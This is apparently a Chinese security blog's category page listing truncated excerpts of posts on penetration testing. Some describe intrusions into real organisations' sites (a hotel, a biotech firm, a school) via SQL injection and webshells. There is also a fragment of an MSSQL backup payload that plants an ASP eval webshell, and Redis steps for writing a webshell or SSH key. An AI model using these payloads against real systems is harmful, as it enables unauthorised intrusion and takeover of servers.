DYBOY's Blog

网络安全

维护网络安全,学习、能力和价值!

网络安全
[渗透实战]某生物科技有限公司之爆菊到站群

前一篇是ASPCMS的实战测试,但是遇到了一些限制,下面这个爆菊记录一下不明白的可以看一下前一篇文章《[渗透测试]某国际酒店》0x01留言板一句话:看到留言板有这个内容存在:直接菜刀连接,密码为a上传测试发现还是没有写的权限…由于备份文件较大,导致执行速度很慢下面测试第二种方式0x02EXP注入得到管理员密码:解密得到:管理员账号:admin...

网络安全
[渗透实战]某国际酒店测试

这是某个国际酒店的网站,由于使用了AspCms2.0,通过SQL注入我们很快可以拿下shell此次测试中,由于网站限制了所有的读写权限,由各种错误,以及最后的小马根本没什么权限。0x01基础信息:简单看看指纹信息:是ASPCMS的,通过一个通用SQL注入拿到管理员的账号密码:EXP:https://blog.dyboy.cn/plug/comment/com...

网络安全
[渗透实战]记录某职业中学测试

记录一下对于一个职业学院的渗透测试过程。团队的力量很强大,安全无小事!0x01偶遇&吐槽:在机缘巧合下,遇见了这个网站,发现有一个旧版网站,还是动易的CMS,指纹查看一下:网站中还存在这些有趣的东西:然后使用御剑扫了一下,发现可以下载数据库,然后我就把这个洞,提交给了360的补天平台,好歹算个学校吧,一共提交了两次,第一次说漏洞不够详细。。。(一个数据库下载漏...

网络安全
SQL盲注学习到EXP编写

今天整理一下SQL盲注,之前说好了整理分享的,这篇文章一直在草稿箱躺着,今天整理补充好了,感兴趣的朋友收藏啊!最近忙着写主题模版,写插件,帮朋友做项目安全测试,还有自己学校的期末考试,但是越是期末,与紧张,就越是感觉非常刺激~对于SQL注入还不理解的朋友可以参看之前的文章《SQL注入基础》,本文章主要讲SQL盲注。0x00盲注简介:顾名思义,像盲人一样注入(什么鬼解释…),通...

网络安全
PHP的常见及过滤函数探究

在源代码审计的过程中,经常会遇到各种过滤函数,了解这些函数并知道fuzz就能更好的完成组合拳,以PHP为引,抛砖引玉。0x00intval()function:此函数主要用于将变量强转为向下取整的整型数字example:xxxxx->02xxxx->22.044->20.555->05e10->5...

网络安全
[转]Upload-labs所有WriteUp

想看看Github上的upload-labs,但是最近复习没啥时间,同学发了我一个wp的链接,所以转载了,写的确实不错,可做参考。0x00:前言本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs(最新commit17ec936)的19个上传关卡的方法。文章适合有一定上传绕过知识基础的读者阅读,绕过原理请参考其它文章和项目源码,限于篇幅文章中不展开解释。...

网络安全
[局域网劫持]如何搞懵蹭网的同学-详细过程

在学校内,小东的WIFI是没有设密码的,所有有很多同学偷偷蹭网,本次实验是想说公共WIFI不要随便去连接啊。0x00起因最近网络老卡了,打开路由器管理界面,发现连着20多个终端呐,由于新开了博客地址:https://blog.dyboy.cn,又没啥人访问,在整理之前的文章时,看到了这篇[笔记]Metasploit内网/局域网劫持,所以顺便实操并记录之。0x01实操打开虚拟机中的...

网络安全
MSSQL备份提权

Myssql备份提权;alterdatabasexxxxsetRECOVERYFULL--;createtablecmd(aimage)--;backuplogxxxxtodisk='d:/web/1.bak'withinit--;insertintocmd(a)values('<%evalrequest(123)%...

网络安全
IIS短文件扫描

利用“~”字符猜解暴露短文件/文件夹名Windows还以8.3格式生成与MS-DOS兼容的(短)文件名,以允许基于MS-DOS或16位Windows的程序访问这些文件。在cmd下输入“dir/x”即可看到短文件名的效果。Usage:python2iis6.0_shortname_scan.pyhttps://blog.dyboy.cnNotice:...

网络安全
[渗透测试]Redis未授权访问漏洞利用

偶然发现某大佬博客说了一下Redis的漏洞,便整理了一下笔记,并做了实战测试0x00笔记1.写入webshelldir=绝对路径dbfilename="1.php"2.写入ssh公钥匙本机生成公钥sshssh-keygen-trsa-C"test@test"dir=/root/.ssh/dbfilename=authorized_keys\n...

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap